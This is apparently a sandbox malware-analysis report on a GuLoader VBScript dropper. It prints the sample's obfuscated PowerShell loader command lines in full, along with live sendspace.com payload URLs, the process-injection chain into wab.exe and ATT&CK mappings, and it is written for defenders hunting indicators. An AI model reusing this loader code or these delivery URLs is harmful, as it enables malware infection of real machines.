              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour 
BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasenJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- 
LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasenJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              MITRE ATT&CK Matrix (techniques listed per tactic column, top row first; a number in front of a technique is the count badge shown next to it in the report)

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
              Resource Development: 221 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
              Execution: 1 Windows Management Instrumentation; 11 Command and Scripting Interpreter; 1 Exploitation for Client Execution; 2 PowerShell; Launchd; Scheduled Task
              Persistence: 221 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
              Privilege Escalation: 111 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
              Defense Evasion: 1 Masquerading; 31 Virtualization/Sandbox Evasion; 111 Process Injection; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
              Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
              Discovery: 11 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 13 System Information Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
              Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
              Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
              Behavior Graph ID: 1446633 | Sample: update.vbs | Startdate: 23/05/2024 | Architecture: WINDOWS | Score: 100
              Top-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Yara detected GuLoader; 3 other signatures
              Contacted hosts: www.sendspace.com; fs13n1.sendspace.com; fs03n2.sendspace.com
              Process tree:
                wscript.exe (started) [signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures]
                  powershell.exe (started) [DNS/IP: fs13n1.sendspace.com 69.31.136.57, 443, 49705, GTT-BACKBONEGTTDE, United States; www.sendspace.com 104.21.28.80, 443, 49704, 49713, CLOUDFLARENETUS, United States] [signatures: Suspicious powershell command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading]
                    powershell.exe (started) [signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading]
                      wab.exe (started) [DNS/IP: fs03n2.sendspace.com 69.31.136.17, 443, 49714, GTT-BACKBONEGTTDE, United States]
                      cmd.exe (started)
                    conhost.exe (started)
                    cmd.exe (started)

              SourceDetectionScannerLabelLink
              update.vbs8%ReversingLabsWin32.Trojan.Generic
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://www.sendspace.com/pro/dl/medjl1 | 0% | Avira URL Cloud | safe
https://fs03n2.sendspace.com/m | 0% | Avira URL Cloud | safe
http://www.sendspace.com | 0% | Avira URL Cloud | safe
http://fs13n1.sendspace.com | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/7dhid7 | 0% | Avira URL Cloud | safe
https://fs03n2.sendspace.com/. | 0% | Avira URL Cloud | safe
https://www.sendspace.com/IwX | 0% | Avira URL Cloud | safe
https://www.sendspace.com | 0% | Avira URL Cloud | safe
https://fs03n2.sendspace.com/5778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin | 0% | Avira URL Cloud | safe
https://fs03n2.sendspace.com/om:443l | 0% | Avira URL Cloud | safe
https://fs03n2.sendspace.com/dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/7dhid7P | 0% | Avira URL Cloud | safe
https://www.sendspace.com/ | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/7dhid7XR | 0% | Avira URL Cloud | safe
https://fs03n2.sendspace.com/ | 0% | Avira URL Cloud | safe
https://fs03n2.sendspace.com/dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119 | 0% | Avira URL Cloud | safe
https://fs13n1.sendspace.com/dlpro/008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/Castrate.xtp | 0% | Avira URL Cloud | safe
https://fs13n1.sendspaX | 0% | Avira URL Cloud | safe
https://fs13n1.sendspace.com | 0% | Avira URL Cloud | safe
https://fs13n1.sendspace.com0 | 0% | Avira URL Cloud | safe
http://crl.microt | 0% | Avira URL Cloud | safe

Two things to keep in mind when reading this table. The nuget.org, contoso.com, aka.ms, apache.org, pesterbdd.com and github.com/Pester entries are strings from PowerShell's own runtime and module metadata (the PowerShellGet and Pester 3.4.0 manifests that appear in the module cache file dropped below), not from the sample, so the 100% "malware" verdict on Pester.png is a reputation false positive on a stock Windows module rather than an indicator for update.vbs. Conversely, every sendspace.com URL is rated "safe" because the host is a legitimate file-sharing service, even though these are the URLs the chain actually downloaded from; URL reputation alone would not have caught this delivery. Entries such as "https://fs13n1.sendspaX" and "http://crl.microt" are truncated strings scraped from process memory and are kept as found.
Name | IP | Active | Malicious | Antivirus Detection | Reputation
fs03n2.sendspace.com | 69.31.136.17 | true | false | | unknown
www.sendspace.com | 104.21.28.80 | true | false | | unknown
fs13n1.sendspace.com | 69.31.136.57 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://www.sendspace.com/pro/dl/medjl1 | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/pro/dl/7dhid7 | false | Avira URL Cloud: safe | unknown
https://fs13n1.sendspace.com/dlpro/008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/Castrate.xtp | false | Avira URL Cloud: safe | unknown
https://fs03n2.sendspace.com/dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin | false | Avira URL Cloud: safe | unknown

These four are the delivery URLs the chain fetched: the two /pro/dl/ landing pages on www.sendspace.com, the Castrate.xtp file served by fs13n1.sendspace.com (contacted by the first powershell.exe) and the lLQuXHVIIjCqr119.bin file served by fs03n2.sendspace.com (contacted by the injected wab.exe), matching the behavior graph above. They are the indicators worth blocking or hunting on in this report, despite the "safe" reputation verdicts.
Name | Source (process, memory dump) | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2737781412.0000026F3F960000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://fs13n1.sendspace.com | powershell.exe, 00000002.00000002.2635114145.0000026F2FE42000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://go.micro | powershell.exe, 00000002.00000002.2635114145.0000026F30E0B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.sendspace.com/IwX | wab.exe, 00000008.00000002.2724545147.0000000000638000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs03n2.sendspace.com/. | wab.exe, 00000008.00000003.2547665932.00000000006A6000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs03n2.sendspace.com/m | wab.exe, 00000008.00000003.2547665932.00000000006A6000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sendspace.com | powershell.exe, 00000002.00000002.2635114145.0000026F31AED000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com | powershell.exe, 00000002.00000002.2635114145.0000026F2FB17000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000002.00000002.2635114145.0000026F3192E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs03n2.sendspace.com/5778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin | wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs03n2.sendspace.com/om:443l | wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/ | wab.exe, 00000008.00000002.2724545147.0000000000638000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000005.00000002.2558091111.0000000004C71000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.sendspace.com/pro/dl/7dhid7XR | powershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2737781412.0000026F3F960000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs03n2.sendspace.com/dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119 | wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/pro/dl/7dhid7P | powershell.exe, 00000002.00000002.2635114145.0000026F2FB17000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs03n2.sendspace.com/ | wab.exe, 00000008.00000002.2724545147.000000000069D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs13n1.sendspaX | powershell.exe, 00000002.00000002.2635114145.0000026F31B12000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2635114145.0000026F2F8F1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2635114145.0000026F2F8F1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000005.00000002.2558091111.0000000004C71000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs13n1.sendspace.com | powershell.exe, 00000002.00000002.2635114145.0000026F31B12000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs13n1.sendspace.com0 | powershell.exe, 00000002.00000002.2635114145.0000026F2FE30000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.microt | powershell.exe, 00000005.00000002.2565659187.000000000771D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
69.31.136.17 | fs03n2.sendspace.com | United States | 3257 | GTT-BACKBONEGTTDE | false
104.21.28.80 | www.sendspace.com | United States | 13335 | CLOUDFLARENETUS | false
69.31.136.57 | fs13n1.sendspace.com | United States | 3257 | GTT-BACKBONEGTTDE | false
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1446633
                    Start date and time:2024-05-23 18:24:06 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 19s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:11
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:update.vbs
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winVBS@13/9@3/3
                    EGA Information:Failed
                    HCA Information:
                    • Successful, ratio: 68%
                    • Number of executed functions: 22
                    • Number of non-executed functions: 11
                    Cookbook Comments:
                    • Found application associated with file extension: .vbs
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target powershell.exe, PID 1988 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 2624 because it is empty
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analysed; the report is missing behavior information
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: update.vbs
Time | Type | Description
12:25:04 | API Interceptor | 21024x Sleep call for process: powershell.exe modified
Match (IP) | Associated Sample Name / URL | Detection | Threat Name
69.31.136.17 | DOCUMENTS.exe.html | malicious | Unknown
69.31.136.17 | JAN_YDHM007390.vbs | malicious | Unknown
69.31.136.17 | UGH82MSGHWUSHSDHWQOL.vbs | malicious | Unknown
69.31.136.17 | 1st_Payment.vbs | malicious | Revenge
69.31.136.57 | https://www.sendspace.com/file/dwfkjz | malicious | FormBook
69.31.136.57 | #W002UHNSOP.vbs | malicious | Unknown
69.31.136.57 | 1st_Payment_Copy.vbs | malicious | Unknown
69.31.136.57 | 1st_Payment.vbs | malicious | Revenge
69.31.136.57 | QWMSA_Payment_Invoice0939.vbs | malicious | Quasar
69.31.136.57 | QA6433_#002.vbs | malicious | njRat
Match (domain) | Associated Sample Name / URL | Detection | Threat Name | Context (resolved IP)
fs03n2.sendspace.com | DOCUMENTS.exe.html | malicious | Unknown | 69.31.136.17
fs03n2.sendspace.com | JAN_YDHM007390.vbs | malicious | Unknown | 69.31.136.17
fs13n1.sendspace.com | #W002UHNSOP.vbs | malicious | Unknown | 69.31.136.57
www.sendspace.com | https://www.sendspace.com/pro/dl/hg4kq5 | malicious | Unknown | 172.64.104.11
www.sendspace.com | RFQ_#_1045981_-_MAA_D_Plant_Project_r01.exe.html | malicious | Unknown | 172.67.161.115
www.sendspace.com | https://www.sendspace.com/file/dwfkjz | malicious | FormBook | 104.21.91.185
www.sendspace.com | DOCUMENTS.exe.html | malicious | Unknown | 172.64.202.8
www.sendspace.com | SecuriteInfo.com.Trojan.KillProc2.9731.8373.22974.exe | malicious | GuLoader | 172.64.108.22
www.sendspace.com | RdMr3o5vB2.exe | malicious | CryptOne, Djvu, Raccoon Stealer v2, SmokeLoader, Socelars | 172.67.141.102
www.sendspace.com | New Order.exe | malicious | Oski Stealer Vidar | 172.67.141.102
www.sendspace.com | QzvyuYJlDX.exe | malicious | Unknown | 104.21.41.17
www.sendspace.com | XZ22CfAOCN.exe | malicious | RedLine SmokeLoader Tofsee Vidar | 172.64.173.34
www.sendspace.com | eLc127EVdf.exe | malicious | RedLine SmokeLoader Tofsee | 104.21.81.195

The IP and domain matches above are to a shared file-sharing service, so the unrelated families they list (FormBook, Quasar, njRat, RedLine, Mirai and others) reflect many actors abusing the same hosting, not infrastructure controlled by this sample's operator. Pivot on the /pro/dl/ and /dlpro/ paths and the file names rather than on the sendspace.com hosts or their IPs.
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
CLOUDFLARENETUS | windows.vbs | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | https://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621 | malicious | HtmlDropper, HTMLPhisher | 104.17.2.184
